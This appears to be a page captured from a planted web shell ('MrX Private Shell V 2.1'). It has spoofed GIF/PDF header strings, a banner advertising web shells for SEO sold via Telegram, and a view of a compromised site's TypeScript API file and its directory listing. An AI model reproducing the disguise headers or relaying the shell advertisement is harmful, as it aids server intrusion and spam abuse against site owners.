GIF89; GIF89; %PDF- %PDF-
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
import { $modelStore } from '@shared/index';
import { axiosInstance } from "@shared/api";
interface IPutMoveRow {
article_id?: number | undefined
article_group_id: any
new_line: number
}
export const putMoveRow = async (body: IPutMoveRow) => {
try {
const modelId = $modelStore.getState().model;
if (!modelId) {
throw new Error("modelId не задана");
}
const result = await axiosInstance.put(`cash-flow/article-move/${modelId}`, {...body});
return result?.data
} catch (error: any) {
console.error('[DDS.putMoveRow] error:', {
message: error?.message,
status: error?.response?.status,
data: error?.response?.data,
url: error?.config?.url,
method: error?.config?.method
});
throw error;
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| checkModelAccess.ts | File | 2.47 KB | 0644 |
|
| exportToFile.ts | File | 783 B | 0644 |
|
| getArticlesGroupCash.ts | File | 4.24 KB | 0644 |
|
| getCash.tsx | File | 4.58 KB | 0644 |
|
| getDetailArticle.ts | File | 12.54 KB | 0644 |
|
| getKassaList.ts | File | 725 B | 0644 |
|
| getPaymentStatus.ts | File | 737 B | 0644 |
|
| putMoveRow.ts | File | 860 B | 0644 |
|